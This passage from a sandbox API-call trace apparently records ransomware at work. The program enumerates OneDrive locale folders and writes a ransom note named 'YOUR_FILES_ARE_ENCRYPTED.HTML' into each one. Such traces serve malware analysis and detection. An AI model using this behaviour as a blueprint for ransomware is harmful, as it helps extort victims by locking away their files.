ftLastWriteTime.dwLowDateTime=0xd80fd0fc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ka", cAlternateFileName="")) returned 1 [0113.617] StrStrIW (lpFirst="ka", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.617] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka") returned 78 [0113.617] GetProcessHeap () returned 0x600000 [0113.617] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.617] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka" [0113.617] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka\\*" [0113.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd80fd0fc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd80fd0fc, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdc3e4e43, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd80fd0fc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd80fd0fc, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdc3e4e43, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc3e4e43, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdc3e4e43, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdd9805f5, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.617] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.617] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.617] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.617] lstrlenW (lpString=".mui") returned 4 [0113.617] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.617] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc3e4e43, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdc3e4e43, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdd9805f5, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.618] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.618] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.618] GetProcessHeap () returned 0x600000 [0113.618] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ka\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.618] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.619] CloseHandle (hObject=0x330) returned 1 [0113.619] GetProcessHeap () returned 0x600000 [0113.619] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.619] GetProcessHeap () returned 0x600000 [0113.619] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.619] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddeb7a58, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xddeb7a58, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xddeb7a58, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kk", cAlternateFileName="")) returned 1 [0113.619] StrStrIW (lpFirst="kk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.619] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk") returned 78 [0113.619] GetProcessHeap () returned 0x600000 [0113.619] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.619] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk" [0113.619] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk\\*" [0113.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddeb7a58, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xddeb7a58, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xde35637f, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.619] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddeb7a58, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xddeb7a58, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xde35637f, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.619] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde35637f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xde35637f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xde6c36dc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.620] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.620] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.620] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.620] lstrlenW (lpString=".mui") returned 4 [0113.620] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.620] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde35637f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xde35637f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xde6c36dc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.620] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.620] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.620] GetProcessHeap () returned 0x600000 [0113.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\kk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.620] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.621] CloseHandle (hObject=0x330) returned 1 [0113.621] GetProcessHeap () returned 0x600000 [0113.621] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.621] GetProcessHeap () returned 0x600000 [0113.621] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.621] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde75c030, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xde75c030, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xde75c030, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="km-kh", cAlternateFileName="")) returned 1 [0113.621] StrStrIW (lpFirst="km-kh", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.621] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh") returned 81 [0113.621] GetProcessHeap () returned 0x600000 [0113.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.621] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh" [0113.621] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh\\*" [0113.622] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde75c030, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xde75c030, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdeaa3767, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626978 [0113.622] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde75c030, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xde75c030, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdeaa3767, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.622] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeaa3767, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdeaa3767, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdee62eb6, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.622] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.622] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.622] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.622] lstrlenW (lpString=".mui") returned 4 [0113.622] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.622] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeaa3767, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdeaa3767, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdee62eb6, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.622] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0113.622] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.622] GetProcessHeap () returned 0x600000 [0113.622] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\km-kh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0113.622] WriteFile (in: hFile=0x330, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.637] CloseHandle (hObject=0x330) returned 1 [0113.638] GetProcessHeap () returned 0x600000 [0113.638] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.643] GetProcessHeap () returned 0x600000 [0113.643] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.643] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf0b004c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdf0b004c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xdf0b004c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kn", cAlternateFileName="")) returned 1 [0113.643] StrStrIW (lpFirst="kn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.643] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn") returned 78 [0113.643] GetProcessHeap () returned 0x600000 [0113.643] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.643] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn" [0113.643] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn\\*" [0113.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf0b004c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdf0b004c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe0443839, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.644] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf0b004c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xdf0b004c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe0443839, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.644] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0443839, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe0443839, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe07b0e0d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.644] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.644] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.644] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.644] lstrlenW (lpString=".mui") returned 4 [0113.644] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.644] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0443839, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe0443839, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe07b0e0d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.644] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.644] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.644] GetProcessHeap () returned 0x600000 [0113.644] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\kn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.648] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.649] CloseHandle (hObject=0x334) returned 1 [0113.649] GetProcessHeap () returned 0x600000 [0113.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.649] GetProcessHeap () returned 0x600000 [0113.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.649] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe086faec, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe086faec, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe086faec, ftLastWriteTime.dwHighDateTime=0x1d70073, 